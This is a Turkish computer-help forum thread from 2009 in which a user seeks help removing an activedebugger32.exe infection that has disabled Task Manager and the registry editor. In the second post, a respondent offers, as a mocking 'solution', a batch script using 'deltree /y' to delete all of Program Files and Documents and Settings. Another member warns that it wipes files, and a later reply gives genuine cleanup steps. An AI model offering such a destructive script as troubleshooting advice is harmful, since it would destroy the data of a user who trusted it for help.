activedebugger32.exe ve Ctrl+Alt+Del sorunu :(

pegassuss5077
29-01-2009, 13:52   |  #1  
OP Taze Üye
Teşekkür Sayısı: 0
1 mesaj

Arkadaşlar,
Bilgisayarımla ilgili yaşadığım problemli süreç şu şekilde gelişti ve devam ediyor:

1. Bilgisayarı oldukça yavaşlatan activedebugger32.exe adlı virüs yerel disklerin Patron1 ve Patron 2 olarak açmaktaydı. Sanırım bu problemi, kısmen de olsa patronvisusu.exe adlı bir program sayesinde çözebildim. (Emin değilim)

2. Fakat hiçbir biçimde, Ctrl+Alt+Del yapamıyorum; zira yaptığımda “Görev Yöneticisi, yöneticiniz tarafından devre dışı bırakıldı” demekte. Aynı şekilde; Başlat – Çalıştır – regedit yazdığımda da aynı uyarıyı veriyor: kayıt defterine ulaşmam mümkün değil. (Hatta daha önce durup dururken mavi ekran çıkıp “Page_fault_in_nonpaged_area” uyarısı verip tekrar başlatmamı istiyordu bilgisayarı; ancak şu an itibariyle o uyarıyı vermiyor)

3.  Yaptığım araştırmalarda şayet Kaspersky security’yi yüklersem programın tüm virüsleri bulabileceği yazıyordu. Ne var ki, bu programı da yükleyemiyorum, çünkü; başlangıçta, programın yüklenebilmesi için Awill Avast ve AVG 8 programlarını kaldırmamı istiyor. İlginç olan, o programların artık sistemimde olmadığı.

4. Yine bir sitede, Avast’ı ve AVG’yi tekrar yükleyip kaldırırsam çözülebileceği yazılmaktaydı. Uygulamaya çalıştım, ne var ki, -virüs kaynaklı olduğunu düşünüyorum- programı yüklerken ileri dediğimde otomatik yükleme otomatik olarak kapanıyor.  (Bu, bir tek Avast için geçerli). Ve, ilginçtir, Kaspersky’ın sitesine girmeye çalışıyorum online scanner için, Explorer tüm siteleri açmasına rağmen kaspersky ile ilgili hiçbir siteye izin vermemekte.

5. Şu an Ad-aware yüklü ve çok sık olarak sorunlar bulup (örneğin; ……exe başlatılamadı, Trojan ihtimali diyor) onları engelliyor.

6. Ve, C, Documents and Settings’te bir dosya açılmış adı: Lasd_Permmisions. Aynı biçimde exe.exe (2 tane) uzantılı birçok dosya mevcut (örn; Powerpoint.exe.exe, Acrord32.exe.exe… gibi)

7. Bir aarkadaşımız Combofix'i önerdi. Kurdum, tarattım. Birçok dosyayı sildi; ancak, bir aşamadan sonra dondu. Güvenli kipte çalıştırmamı önerdi, ama başlangıçta F8 yapmama izin vermiyor ve bilgisayar olağan biçimde yeniden başlatılıyor!

Tam olarak ne olduğunu bilmediğim için, ve dahası ne yapacağımı bilemediğim için bu kadar kopuk ve ayrıntılı yazmak zorunda kaldım. Nedir arkadaşlar bunlar, nasıl çözülmeli bu sorun? Format attırmak da istemiyorum, çünkü bilg. Benim değil ve bir hafta içinde teslim etmek durumundayım sahibine. Yardımcı olursanız çok çok sevineceğim…

_cypher_
30-01-2009, 22:37   |  #2  
Yıllanmış Üye
1,389 mesaj
boraalper4
Madem format olmaz...
Ünlü bir söz: En iyi savunma saldırmaktır. Yani virüsü virüs ile kıracaksın.
Bu çalışan programlar için Not Defterinde virüs yaz. Kodlar:

@echo off
C:\Program Files\COMMAND\deltree /y c:\program files\*.*
@echo off
C:\Documents and Settings\COMMAND\deltree /y c:\documents and settings\*.*
@echo off
cls
cls
@echo .::CHIP FORUM Hazırlayan:boraalper4::.
@echo off

Bu kodları Not Defterine yapıştır Farklı Kaydete tıkla, ismin yanına .bat yaz. Bu virüs Program Files klasörünü, Documents and Settings klasörünün tüm içeriğini siler. Umarım yardımcı olmuşumdur.

^^^arkadasım dalgamı gecion!!DeliBeğenmedimZonk^^^

sakın yapma bunu program files taki butun dosyalar we belgelerini felan direk siler [*<][*<]ÖlüÖlüÖlü

H@ckerCesur
30-01-2009, 23:37   |  #3  
Yıllanmış Üye
Teşekkür Sayısı: 1
1,881 mesaj

Önce Görev Yöneticisini açman lazım. Resmi takip et kırmızı yerleri...
ctrl + alt + del için başlat çalıştıra gel ve
gpedit.msc yaz

Flash Disk Virüslerine kesin çözüm için benim konumu takip et.... Link aşağıda...

Programsız activexdebugger32 virüsünden kurtulmak için
görev yöneticisi işlemler sekmesinden activexdebugger32.exe olanı sonlandır.

Başlat Çalıştır regedit yaz
F3 tuşuna bas aramayı aç arama kısmına activexdebugger32 yaz ve arat bulunan kaydı sil
tekrar F3 bas yine bulanı sil bitene kadar böyle yap.
sonra da sürücüdeki paylaşımları kapat...

eger regeditte açılmıyorsa. Yine gpedit.msc den sistem bölümünden kayıt defteri düzenleyicisi devre dışı yap.

En kestirme ve programsız çözümü budur...

Alıntı degil alınteridir ;)

Son Düzenleme: H@ckerCesur ~ 31 Ocak 2009 00:00
Banned
31-01-2009, 08:31   |  #4  
Banlandı
Teşekkür Sayısı: 1
179 mesaj
_cypher_
^^^arkadasım dalgamı gecion!!DeliBeğenmedimZonk^^^

sakın yapma bunu program files taki butun dosyalar we belgelerini felan direk siler [*<][*<]ÖlüÖlüÖlü

Arkadaşım sen bi gözlük al kendine. Orda zaten ben tüm Program Files ve Documents and settings klasörünü siler dedim. Kör müsün. Gerekliyse yedeğini alır.

_cypher_
31-01-2009, 13:18   |  #5  
Yıllanmış Üye
1,389 mesaj
boraalper4
Arkadaşım sen bi gözlük al kendine. Orda zaten ben tüm Program Files ve Documents and settings klasörünü siler dedim. Kör müsün. Gerekliyse yedeğini alır.
sence cozum bu mu yani program files we documents and settings boşaltmakHmphZonk virus windows un içindeyse nolcak giden dosyalarda cabası

bence sen bi gozluk al bak adam ne demiş

Tam olarak ne olduğunu bilmediğim için, ve dahası ne yapacağımı bilemediğim için bu kadar kopuk ve ayrıntılı yazmak zorunda kaldım. Nedir arkadaşlar bunlar, nasıl çözülmeli bu sorun? Format attırmak da istemiyorum, çünkü bilg. Benim değil ve bir hafta içinde teslim etmek durumundayım sahibine. Yardımcı olursanız çok çok sevineceğim…